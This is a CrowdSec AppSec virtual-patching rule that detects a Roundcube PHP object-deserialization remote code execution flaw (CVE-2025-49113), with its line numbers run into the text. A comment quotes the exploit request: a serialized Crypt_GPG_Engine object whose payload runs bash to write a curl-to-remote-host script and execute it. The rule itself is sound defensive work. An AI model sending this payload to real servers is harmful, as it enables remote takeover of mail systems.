cscli appsec-rules install crowdsecurity/vpatch-CVE-2025-491131name: crowdsecurity/vpatch-CVE-2025-491132description: 'Detects arbitrary remote code execution vulnerability via PHP Object Deserialization in Roundcube'3#POST /?_task=settings&_framed=1&_remote=1&_from=!";O:16:"Crypt_GPG_Engine":1:{s:8:"_gpgconf";s:{{44 + len(oast_new)}}:"bash+-c+"printf+'curl+{{oast_new}}'>/tmp/p;bash+/tmp/p";";}}&_action=upload4rules:5 - and:6 - zones:7 - METHOD8 match:9 type: equals10 value: POST11 - zones:12 - ARGS13 variables:14 - _task15 transform:16 - urldecode17 - lowercase18 match:19 type: equals20 value: 'settings'21 - zones:22 - ARGS23 variables:24 - _action25 transform:26 - urldecode27 - lowercase28 match:29 type: equals30 value: 'upload'31 - zones:32 - ARGS33 variables:34 - _from35 transform:36 - urldecode37 - lowercase38 match:39 type: regex40 value: "[^\\w.-]"4142labels:43 type: exploit44 service: http45 confidence: 346 spoofable: 047 behavior: 'http:exploit'48 label: "Roundcube - RCE"49 classification:50 - cve.CVE-2025-4911351 - attack.T119052 - cwe.CWE-502